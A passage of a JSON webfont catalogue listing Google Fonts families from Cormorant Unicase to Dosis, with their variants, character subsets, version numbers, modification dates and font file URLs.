      "version": "v10",
      "lastModified": "2020-09-25",
      "files": {
        "300": "http://fonts.gstatic.com/s/cormorantunicase/v10/HI_ViZUaILtOqhqgDeXoF_n1_fTGX9N_tucv7Gy0DRzS.ttf",
        "regular": "http://fonts.gstatic.com/s/cormorantunicase/v10/HI_QiZUaILtOqhqgDeXoF_n1_fTGX-vTnsMnx3C9.ttf",
        "500": "http://fonts.gstatic.com/s/cormorantunicase/v10/HI_ViZUaILtOqhqgDeXoF_n1_fTGX9Mnt-cv7Gy0DRzS.ttf",
        "600": "http://fonts.gstatic.com/s/cormorantunicase/v10/HI_ViZUaILtOqhqgDeXoF_n1_fTGX9MLsOcv7Gy0DRzS.ttf",
        "700": "http://fonts.gstatic.com/s/cormorantunicase/v10/HI_ViZUaILtOqhqgDeXoF_n1_fTGX9Nvsecv7Gy0DRzS.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cormorant Upright",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v8",
      "lastModified": "2020-09-25",
      "files": {
        "300": "http://fonts.gstatic.com/s/cormorantupright/v8/VuJudM3I2Y35poFONtLdafkUCHw1y1N5phDsU9X6RPzQ.ttf",
        "regular": "http://fonts.gstatic.com/s/cormorantupright/v8/VuJrdM3I2Y35poFONtLdafkUCHw1y2vVjjTkeMnz.ttf",
        "500": "http://fonts.gstatic.com/s/cormorantupright/v8/VuJudM3I2Y35poFONtLdafkUCHw1y1MhpxDsU9X6RPzQ.ttf",
        "600": "http://fonts.gstatic.com/s/cormorantupright/v8/VuJudM3I2Y35poFONtLdafkUCHw1y1MNoBDsU9X6RPzQ.ttf",
        "700": "http://fonts.gstatic.com/s/cormorantupright/v8/VuJudM3I2Y35poFONtLdafkUCHw1y1NpoRDsU9X6RPzQ.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Courgette",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/courgette/v8/wEO_EBrAnc9BLjLQAUkFUfAL3EsHiA.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Courier Prime",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/courierprime/v2/u-450q2lgwslOqpF_6gQ8kELWwZjW-_-tvg.ttf",
        "italic": "http://fonts.gstatic.com/s/courierprime/v2/u-4n0q2lgwslOqpF_6gQ8kELawRpX837pvjxPA.ttf",
        "700": "http://fonts.gstatic.com/s/courierprime/v2/u-4k0q2lgwslOqpF_6gQ8kELY7pMf-fVqvHoJXw.ttf",
        "700italic": "http://fonts.gstatic.com/s/courierprime/v2/u-4i0q2lgwslOqpF_6gQ8kELawRR4-LfrtPtNXyeAg.ttf"
      },
      "category": "monospace",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cousine",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "hebrew",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v16",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/cousine/v16/d6lIkaiiRdih4SpPzSMlzTbtz9k.ttf",
        "italic": "http://fonts.gstatic.com/s/cousine/v16/d6lKkaiiRdih4SpP_SEvyRTo39l8hw.ttf",
        "700": "http://fonts.gstatic.com/s/cousine/v16/d6lNkaiiRdih4SpP9Z8K6T7G09BlnmQ.ttf",
        "700italic": "http://fonts.gstatic.com/s/cousine/v16/d6lPkaiiRdih4SpP_SEXdTvM1_JgjmRpOA.ttf"
      },
      "category": "monospace",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Coustard",
      "variants": [
        "regular",
        "900"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/coustard/v11/3XFpErgg3YsZ5fqUU9UPvWXuROTd.ttf",
        "900": "http://fonts.gstatic.com/s/coustard/v11/3XFuErgg3YsZ5fqUU-2LkEHmb_jU3eRL.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Covered By Your Grace",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/coveredbyyourgrace/v10/QGYwz-AZahWOJJI9kykWW9mD6opopoqXSOS0FgItq6bFIg.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Crafty Girls",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/craftygirls/v10/va9B4kXI39VaDdlPJo8N_NvuQR37fF3Wlg.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Creepster",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/creepster/v9/AlZy_zVUqJz4yMrniH4hdXf4XB0Tow.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Crete Round",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/creteround/v9/55xoey1sJNPjPiv1ZZZrxJ1827zAKnxN.ttf",
        "italic": "http://fonts.gstatic.com/s/creteround/v9/55xqey1sJNPjPiv1ZZZrxK1-0bjiL2xNhKc.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Crimson Pro",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900",
        "200italic",
        "300italic",
        "italic",
        "500italic",
        "600italic",
        "700italic",
        "800italic",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v13",
      "lastModified": "2020-06-26",
      "files": {
        "200": "http://fonts.gstatic.com/s/crimsonpro/v13/q5uUsoa5M_tv7IihmnkabC5XiXCAlXGks1WZTm18OJE_VNWoyQ.ttf",
        "300": "http://fonts.gstatic.com/s/crimsonpro/v13/q5uUsoa5M_tv7IihmnkabC5XiXCAlXGks1WZkG18OJE_VNWoyQ.ttf",
        "regular": "http://fonts.gstatic.com/s/crimsonpro/v13/q5uUsoa5M_tv7IihmnkabC5XiXCAlXGks1WZzm18OJE_VNWoyQ.ttf",
        "500": "http://fonts.gstatic.com/s/crimsonpro/v13/q5uUsoa5M_tv7IihmnkabC5XiXCAlXGks1WZ_G18OJE_VNWoyQ.ttf",
        "600": "http://fonts.gstatic.com/s/crimsonpro/v13/q5uUsoa5M_tv7IihmnkabC5XiXCAlXGks1WZEGp8OJE_VNWoyQ.ttf",
        "700": "http://fonts.gstatic.com/s/crimsonpro/v13/q5uUsoa5M_tv7IihmnkabC5XiXCAlXGks1WZKWp8OJE_VNWoyQ.ttf",
        "800": "http://fonts.gstatic.com/s/crimsonpro/v13/q5uUsoa5M_tv7IihmnkabC5XiXCAlXGks1WZTmp8OJE_VNWoyQ.ttf",
        "900": "http://fonts.gstatic.com/s/crimsonpro/v13/q5uUsoa5M_tv7IihmnkabC5XiXCAlXGks1WZZ2p8OJE_VNWoyQ.ttf",
        "200italic": "http://fonts.gstatic.com/s/crimsonpro/v13/q5uSsoa5M_tv7IihmnkabAReu49Y_Bo-HVKMBi4Ue5s7dtC4yZNE.ttf",
        "300italic": "http://fonts.gstatic.com/s/crimsonpro/v13/q5uSsoa5M_tv7IihmnkabAReu49Y_Bo-HVKMBi7Ke5s7dtC4yZNE.ttf",
        "italic": "http://fonts.gstatic.com/s/crimsonpro/v13/q5uSsoa5M_tv7IihmnkabAReu49Y_Bo-HVKMBi6Ue5s7dtC4yZNE.ttf",
        "500italic": "http://fonts.gstatic.com/s/crimsonpro/v13/q5uSsoa5M_tv7IihmnkabAReu49Y_Bo-HVKMBi6me5s7dtC4yZNE.ttf",
        "600italic": "http://fonts.gstatic.com/s/crimsonpro/v13/q5uSsoa5M_tv7IihmnkabAReu49Y_Bo-HVKMBi5KfJs7dtC4yZNE.ttf",
        "700italic": "http://fonts.gstatic.com/s/crimsonpro/v13/q5uSsoa5M_tv7IihmnkabAReu49Y_Bo-HVKMBi5zfJs7dtC4yZNE.ttf",
        "800italic": "http://fonts.gstatic.com/s/crimsonpro/v13/q5uSsoa5M_tv7IihmnkabAReu49Y_Bo-HVKMBi4UfJs7dtC4yZNE.ttf",
        "900italic": "http://fonts.gstatic.com/s/crimsonpro/v13/q5uSsoa5M_tv7IihmnkabAReu49Y_Bo-HVKMBi49fJs7dtC4yZNE.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Crimson Text",
      "variants": [
        "regular",
        "italic",
        "600",
        "600italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-10",
      "files": {
        "regular": "http://fonts.gstatic.com/s/crimsontext/v11/wlp2gwHKFkZgtmSR3NB0oRJvaAJSA_JN3Q.ttf",
        "italic": "http://fonts.gstatic.com/s/crimsontext/v11/wlpogwHKFkZgtmSR3NB0oRJfaghWIfdd3ahG.ttf",
        "600": "http://fonts.gstatic.com/s/crimsontext/v11/wlppgwHKFkZgtmSR3NB0oRJXsCx2C9lR1LFffg.ttf",
        "600italic": "http://fonts.gstatic.com/s/crimsontext/v11/wlprgwHKFkZgtmSR3NB0oRJfajCOD9NV9rRPfrKu.ttf",
        "700": "http://fonts.gstatic.com/s/crimsontext/v11/wlppgwHKFkZgtmSR3NB0oRJX1C12C9lR1LFffg.ttf",
        "700italic": "http://fonts.gstatic.com/s/crimsontext/v11/wlprgwHKFkZgtmSR3NB0oRJfajDqDtNV9rRPfrKu.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Croissant One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/croissantone/v8/3y9n6bU9bTPg4m8NDy3Kq24UM3pqn5cdJ-4.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Crushed",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/crushed/v11/U9Mc6dym6WXImTlFT1kfuIqyLzA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cuprum",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "italic",
        "500italic",
        "600italic",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v13",
      "lastModified": "2020-10-08",
      "files": {
        "regular": "http://fonts.gstatic.com/s/cuprum/v13/dg45_pLmvrkcOkBnKsOzXyGWTBcmg-X6ZjzSJjQjgnU.ttf",
        "500": "http://fonts.gstatic.com/s/cuprum/v13/dg45_pLmvrkcOkBnKsOzXyGWTBcmg9f6ZjzSJjQjgnU.ttf",
        "600": "http://fonts.gstatic.com/s/cuprum/v13/dg45_pLmvrkcOkBnKsOzXyGWTBcmgzv9ZjzSJjQjgnU.ttf",
        "700": "http://fonts.gstatic.com/s/cuprum/v13/dg45_pLmvrkcOkBnKsOzXyGWTBcmgwL9ZjzSJjQjgnU.ttf",
        "italic": "http://fonts.gstatic.com/s/cuprum/v13/dg47_pLmvrkcOkBNI_FMh0j91rkhli25jn_YIhYmknUPEA.ttf",
        "500italic": "http://fonts.gstatic.com/s/cuprum/v13/dg47_pLmvrkcOkBNI_FMh0j91rkhli25vH_YIhYmknUPEA.ttf",
        "600italic": "http://fonts.gstatic.com/s/cuprum/v13/dg47_pLmvrkcOkBNI_FMh0j91rkhli25UHjYIhYmknUPEA.ttf",
        "700italic": "http://fonts.gstatic.com/s/cuprum/v13/dg47_pLmvrkcOkBNI_FMh0j91rkhli25aXjYIhYmknUPEA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cute Font",
      "variants": [
        "regular"
      ],
      "subsets": [
        "korean",
        "latin"
      ],
      "version": "v8",
      "lastModified": "2019-07-16",
      "files": {
        "regular": "http://fonts.gstatic.com/s/cutefont/v8/Noaw6Uny2oWPbSHMrY6vmJNVNC9hkw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cutive",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/cutive/v12/NaPZcZ_fHOhV3Ip7T_hDoyqlZQ.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cutive Mono",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/cutivemono/v9/m8JWjfRfY7WVjVi2E-K9H5RFRG-K3Mud.ttf"
      },
      "category": "monospace",
      "kind": "webfonts#webfont"
    },
    {
      "family": "DM Mono",
      "variants": [
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "300": "http://fonts.gstatic.com/s/dmmono/v2/aFTR7PB1QTsUX8KYvrGyIYSnbKX9Rlk.ttf",
        "300italic": "http://fonts.gstatic.com/s/dmmono/v2/aFTT7PB1QTsUX8KYth-orYataIf4VllXuA.ttf",
        "regular": "http://fonts.gstatic.com/s/dmmono/v2/aFTU7PB1QTsUX8KYhh2aBYyMcKw.ttf",
        "italic": "http://fonts.gstatic.com/s/dmmono/v2/aFTW7PB1QTsUX8KYth-QAa6JYKzkXw.ttf",
        "500": "http://fonts.gstatic.com/s/dmmono/v2/aFTR7PB1QTsUX8KYvumzIYSnbKX9Rlk.ttf",
        "500italic": "http://fonts.gstatic.com/s/dmmono/v2/aFTT7PB1QTsUX8KYth-o9YetaIf4VllXuA.ttf"
      },
      "category": "monospace",
      "kind": "webfonts#webfont"
    },
    {
      "family": "DM Sans",
      "variants": [
        "regular",
        "italic",
        "500",
        "500italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v6",
      "lastModified": "2020-11-06",
      "files": {
        "regular": "http://fonts.gstatic.com/s/dmsans/v6/rP2Hp2ywxg089UriOZSCHBeHFl0.ttf",
        "italic": "http://fonts.gstatic.com/s/dmsans/v6/rP2Fp2ywxg089UriCZaIGDWCBl0O8Q.ttf",
        "500": "http://fonts.gstatic.com/s/dmsans/v6/rP2Cp2ywxg089UriAWCrOB-sClQX6Cg.ttf",
        "500italic": "http://fonts.gstatic.com/s/dmsans/v6/rP2Ap2ywxg089UriCZaw7BymDnYS-Cjk6Q.ttf",
        "700": "http://fonts.gstatic.com/s/dmsans/v6/rP2Cp2ywxg089UriASitOB-sClQX6Cg.ttf",
        "700italic": "http://fonts.gstatic.com/s/dmsans/v6/rP2Ap2ywxg089UriCZawpBqmDnYS-Cjk6Q.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "DM Serif Display",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v4",
      "lastModified": "2019-11-19",
      "files": {
        "regular": "http://fonts.gstatic.com/s/dmserifdisplay/v4/-nFnOHM81r4j6k0gjAW3mujVU2B2K_d709jy92k.ttf",
        "italic": "http://fonts.gstatic.com/s/dmserifdisplay/v4/-nFhOHM81r4j6k0gjAW3mujVU2B2G_Vx1_r352np3Q.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "DM Serif Text",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v4",
      "lastModified": "2019-11-19",
      "files": {
        "regular": "http://fonts.gstatic.com/s/dmseriftext/v4/rnCu-xZa_krGokauCeNq1wWyafOPXHIJErY.ttf",
        "italic": "http://fonts.gstatic.com/s/dmseriftext/v4/rnCw-xZa_krGokauCeNq1wWyWfGFWFAMArZKqQ.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Damion",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/damion/v10/hv-XlzJ3KEUe_YZUbWY3MTFgVg.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Dancing Script",
      "variants": [
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v15",
      "lastModified": "2020-06-26",
      "files": {
        "regular": "http://fonts.gstatic.com/s/dancingscript/v15/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSoHTeB9ptDqpw.ttf",
        "500": "http://fonts.gstatic.com/s/dancingscript/v15/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BAyoHTeB9ptDqpw.ttf",
        "600": "http://fonts.gstatic.com/s/dancingscript/v15/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7B7y0HTeB9ptDqpw.ttf",
        "700": "http://fonts.gstatic.com/s/dancingscript/v15/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7B1i0HTeB9ptDqpw.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Dangrek",
      "variants": [
        "regular"
      ],
      "subsets": [
        "khmer"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/dangrek/v12/LYjCdG30nEgoH8E2gCNqqVIuTN4.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Darker Grotesque",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "300": "http://fonts.gstatic.com/s/darkergrotesque/v2/U9MA6cuh-mLQlC4BKCtayOfARkSVoxr2AW8hTOsXsX0.ttf",
        "regular": "http://fonts.gstatic.com/s/darkergrotesque/v2/U9MH6cuh-mLQlC4BKCtayOfARkSVm7beJWcKUOI.ttf",
        "500": "http://fonts.gstatic.com/s/darkergrotesque/v2/U9MA6cuh-mLQlC4BKCtayOfARkSVo0L3AW8hTOsXsX0.ttf",
        "600": "http://fonts.gstatic.com/s/darkergrotesque/v2/U9MA6cuh-mLQlC4BKCtayOfARkSVo27wAW8hTOsXsX0.ttf",
        "700": "http://fonts.gstatic.com/s/darkergrotesque/v2/U9MA6cuh-mLQlC4BKCtayOfARkSVowrxAW8hTOsXsX0.ttf",
        "800": "http://fonts.gstatic.com/s/darkergrotesque/v2/U9MA6cuh-mLQlC4BKCtayOfARkSVoxbyAW8hTOsXsX0.ttf",
        "900": "http://fonts.gstatic.com/s/darkergrotesque/v2/U9MA6cuh-mLQlC4BKCtayOfARkSVozLzAW8hTOsXsX0.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "David Libre",
      "variants": [
        "regular",
        "500",
        "700"
      ],
      "subsets": [
        "hebrew",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/davidlibre/v5/snfus0W_99N64iuYSvp4W_l86p6TYS-Y.ttf",
        "500": "http://fonts.gstatic.com/s/davidlibre/v5/snfzs0W_99N64iuYSvp4W8GIw7qbSjORSo9W.ttf",
        "700": "http://fonts.gstatic.com/s/davidlibre/v5/snfzs0W_99N64iuYSvp4W8HAxbqbSjORSo9W.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Dawning of a New Day",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/dawningofanewday/v11/t5t_IQMbOp2SEwuncwLRjMfIg1yYit_nAz8bhWJGNoBE.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Days One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/daysone/v10/mem9YaCnxnKRiYZOCLYVeLkWVNBt.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Dekko",
      "variants": [
        "regular"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v7",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/dekko/v7/46khlb_wWjfSrttFR0vsfl1B.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Delius",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/delius/v10/PN_xRfK0pW_9e1rtYcI-jT3L_w.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Delius Swash Caps",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/deliusswashcaps/v12/oY1E8fPLr7v4JWCExZpWebxVKORpXXedKmeBvEYs.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Delius Unicase",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v14",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/deliusunicase/v14/845BNMEwEIOVT8BmgfSzIr_6mmLHd-73LXWs.ttf",
        "700": "http://fonts.gstatic.com/s/deliusunicase/v14/845CNMEwEIOVT8BmgfSzIr_6mlp7WMr_BmmlS5aw.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Della Respira",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/dellarespira/v8/RLp5K5v44KaueWI6iEJQBiGPRfkSu6EuTHo.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Denk One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/denkone/v8/dg4m_pzhrqcFb2IzROtHpbglShon.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Devonshire",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/devonshire/v9/46kqlbDwWirWr4gtBD2BX0Vq01lYAZM.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Dhurjati",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "telugu"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/dhurjati/v8/_6_8ED3gSeatXfFiFX3ySKQtuTA2.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Didact Gothic",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext"
      ],
      "version": "v14",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/didactgothic/v14/ahcfv8qz1zt6hCC5G4F_P4ASpUySp0LlcyQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Diplomata",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/diplomata/v12/Cn-0JtiMXwhNwp-wKxyfYGxYrdM9Sg.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Diplomata SC",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/diplomatasc/v9/buExpoi3ecvs3kidKgBJo2kf-P5Oaiw4cw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Do Hyeon",
      "variants": [
        "regular"
      ],
      "subsets": [
        "korean",
        "latin"
      ],
      "version": "v11",
      "lastModified": "2019-07-16",
      "files": {
        "regular": "http://fonts.gstatic.com/s/dohyeon/v11/TwMN-I8CRRU2zM86HFE3ZwaH__-C.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Dokdo",
      "variants": [
        "regular"
      ],
      "subsets": [
        "korean",
        "latin"
      ],
      "version": "v8",
      "lastModified": "2019-07-16",
      "files": {
        "regular": "http://fonts.gstatic.com/s/dokdo/v8/esDf315XNuCBLxLo4NaMlKcH.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Domine",
      "variants": [
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-09-29",
      "files": {
        "regular": "http://fonts.gstatic.com/s/domine/v10/L0xhDFMnlVwD4h3Lt9JWnbX3jG-2X3LAI10VErGuW8Q.ttf",
        "500": "http://fonts.gstatic.com/s/domine/v10/L0xhDFMnlVwD4h3Lt9JWnbX3jG-2X0DAI10VErGuW8Q.ttf",
        "600": "http://fonts.gstatic.com/s/domine/v10/L0xhDFMnlVwD4h3Lt9JWnbX3jG-2X6zHI10VErGuW8Q.ttf",
        "700": "http://fonts.gstatic.com/s/domine/v10/L0xhDFMnlVwD4h3Lt9JWnbX3jG-2X5XHI10VErGuW8Q.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Donegal One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/donegalone/v8/m8JWjfRYea-ZnFz6fsK9FZRFRG-K3Mud.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Doppio One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/doppioone/v8/Gg8wN5gSaBfyBw2MqCh-lgshKGpe5Fg.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Dorsa",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/dorsa/v11/yYLn0hjd0OGwqo493XCFxAnQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Dosis",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v18",
      "lastModified": "2020-06-26",
      "files": {
        "200": "http://fonts.gstatic.com/s/dosis/v18/HhyJU5sn9vOmLxNkIwRSjTVNWLEJt7MV3BkFTq4EPw.ttf",
        "300": "http://fonts.gstatic.com/s/dosis/v18/HhyJU5sn9vOmLxNkIwRSjTVNWLEJabMV3BkFTq4EPw.ttf",
        "regular": "http://fonts.gstatic.com/s/dosis/v18/HhyJU5sn9vOmLxNkIwRSjTVNWLEJN7MV3BkFTq4EPw.ttf",
        "500": "http://fonts.gstatic.com/s/dosis/v18/HhyJU5sn9vOmLxNkIwRSjTVNWLEJBbMV3BkFTq4EPw.ttf",
        "600": "http://fonts.gstatic.com/s/dosis/v18/HhyJU5sn9vOmLxNkIwRSjTVNWLEJ6bQV3BkFTq4EPw.ttf",
        "700": "http://fonts.gstatic.com/s/dosis/v18/HhyJU5sn9vOmLxNkIwRSjTVNWLEJ0LQV3BkFTq4EPw.ttf",
